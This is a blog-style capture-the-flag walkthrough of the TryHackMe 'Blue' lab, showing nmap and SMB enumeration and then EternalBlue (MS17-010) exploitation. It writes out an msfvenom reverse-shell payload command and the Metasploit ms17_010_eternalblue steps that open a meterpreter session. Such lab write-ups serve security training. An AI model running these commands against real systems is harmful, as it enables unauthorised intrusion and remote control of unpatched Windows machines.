Introduction

https://tryhackme.com/room/bluehttps://tryhackme.com/room/blue

The virtual machine used in this room (Blue) can be downloaded for offline usage from https://darkstar7471.com/resources.html

Scanning & Enumeration

Nmap Scan

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 02:41 IST
Nmap scan report for 10.10.222.170
Host is up (0.55s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49158/tcp open  msrpc              Microsoft Windows RPC
49160/tcp open  msrpc              Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/2%OT=135%CT=1%CU=44123%PV=Y%DS=4%DC=T%G=Y%TM=5F25DB6
OS:6%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=108%TI=I%CI=I%II=I%SS=S%TS=
OS:7)OPS(O1=M508NW8ST11%O2=M508NW8ST11%O3=M508NW8NNT11%O4=M508NW8ST11%O5=M5
OS:08NW8ST11%O6=M508ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
OS:0)ECN(R=Y%DF=Y%T=80%W=2000%O=M508NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=80%CD=Z)
Network Distance: 4 hops
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h40m05s, deviation: 2h53m12s, median: 5s
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:6c:9a:f9:da:c4 (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-08-01T16:14:09-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-08-01T21:14:09
|_  start_date: 2020-08-01T20:18:16
TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   260.90 ms 10.4.0.1
2   ... 3
4   515.55 ms 10.10.222.170
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 215.37 seconds

Services running

Samba Enumeration scripts’ result in nmap

This nmap scan tells us that Samba service is running on the server and that the target machine’s operating system is Windows. We also observe multiple RPC services up and running. We also notice that there is a user named JON.

Service Enumeration

Since there are no other attack surfaces, we proceed with enumerating Samba.

We know from our Nmap Scans the specific version of Samba to be : Windows 7 Professional 7601 Service Pack 1 microsoft-ds

Let us enumerate the service

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $target

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 02:57 IST
Nmap scan report for 10.10.222.170
Host is up (0.59s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb-enum-shares: 
|   note: ERROR: Enumerating shares failed, guessing at common ones (NT_STATUS_ACCESS_DENIED)
|   account_used: <blank>
|   \\10.10.222.170\ADMIN$: 
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|     Anonymous access: <none>
|   \\10.10.222.170\C$: 
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|     Anonymous access: <none>
|   \\10.10.222.170\IPC$: 
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|_    Anonymous access: READ
Nmap done: 1 IP address (1 host up) scanned in 433.85 seconds

It takes a lot of time :P and we do not see a lot of results.

Let’s try to see if the service version is in itself vulnerable? Sometimes we may even get boxes that may not need a lot of enumeration. Let’s see if this is one of them

Vulnerability Analysis

Let us look up the version that we have for this Samba service.

A simple google search gives us the top two results that are really important
1. Exploit-Db — Has all the public exploits
2. Rapid7 is the company that has made Metasploit, that means that there should be a ready to use the module in Metasploit.

Checking exploit-DB tells us that this is the famous Eternal Blue exploit that was responsible for WannaCry Ransomware (https://en.wikipedia.org/wiki/EternalBlue).

We can do this in two ways:
1. Simply use Metasploit and get done.
2. The harder way of exploiting it manually.

Exploitation

Let us first go in the harder way, the exploit is python code.

When we try running the code using python3 we get errors like module not found, we can install those modules by simply using pip3 install <package_name> , except ‘mysmb’

So I started looking for ways if someone has any blog that has mentioned this, I found https://null-byte.wonderhowto.com/how-to/manually-exploit-eternalblue-windows-server-using-ms17-010-python-exploit-0195414/

The fix is simple, we need to download mysmb.py from github and keep it in the same directory as the exploit code. To download the file run

wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py

Once we have that, let us try to run without any parameters.

We get a usage message, saying that we need to provide an IP and a pipe name. Now we know the IP, but I am clueless about what this pipe_name is all about. Let’s google.

Google Seach Results

So far so good, now we know what a pipe name is, now we need to figure out how to get these names!

There is a Metasploit module that can help us, but we are trying the harder way, so let us try to use the first result.

Looks like even this new script uses Metasploit (in one way or another)
I am not sure if this is allowed in OSCP, so I tried a little more to find some other tool, finally found this(https://github.com/p33kab00/pipe-scan). At this point, I am not sure if this is going to work.

I found no help with the script :(

So I started reading a little more, and I found this ( on — https://bestestredteam.com/2019/03/15/using-smbclient-to-enumerate-shares/).

Now it clicked, we saw so many RPC running on different ports, in the script as well we see that some 42 names were checked! I quickly open up the code and find this!

I am sure we might find a hit on some of the RPCs, let’s try that!

List of MSRPC Ports on the target machine: {135,49152,49153,49154,49158,49160}

Let us run the script against port 135. It feels like it is taking generations… Losing my patience 😠

So I thought of checking for pipe_names using Metasploit( what if the scans tampered the system, and it is not running properly ?)

use auxiliary/scanner/smb/pipe_auditor
set RHOSTS <target-ip>

Clearly, something is not right …

So I then thought of providing the names of all the 42 named_pipes that we had. Sadly, even this did not work out.

I finally recalled that there is a machine on HTB names Blue, and Rana-Khalil’s Blog must have a solution without using Metasploit.

After reading this, I thought of proceeding with the same approach.

A list of things that I missed!

I had only downloaded the mysmb.py, the rest of the two steps …

Let us generate the payload

msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.4.9.255 LPORT=4444 > eternal-blue.exe

Now we need to check for credentials - enum4linux -a <target-ip>

We did not get any info that would suggest that guest login is allowed, so I tried to manually add the user using the flag ‘-u’

Hence, we do not need to add a username to the script

I guess there is some error with the remote host. But before doing that, let us try and use Metasploit once, and see if we can get access.

msfconsole -q 
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target-ip>
set LHOST <our-ip>
run

Surprisingly, we get the meterpreter session!

Flag 1 — User directory

Flag2? *Errata: Windows really doesn’t like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare, however, it can happen.

A little bit of google and we find out that the directory is ‘C:\Windows\System32\config’

Parting Thoughts

I am not sure why the other methods did not work out. If I find another way, I shall update this blog, in the meantime, if I need to exploit Eternal_Blue ASAP, I would use Metasploit :P

P.P.S. If anyone of you who are reading this can help me out here, it will be amazing. Thank you.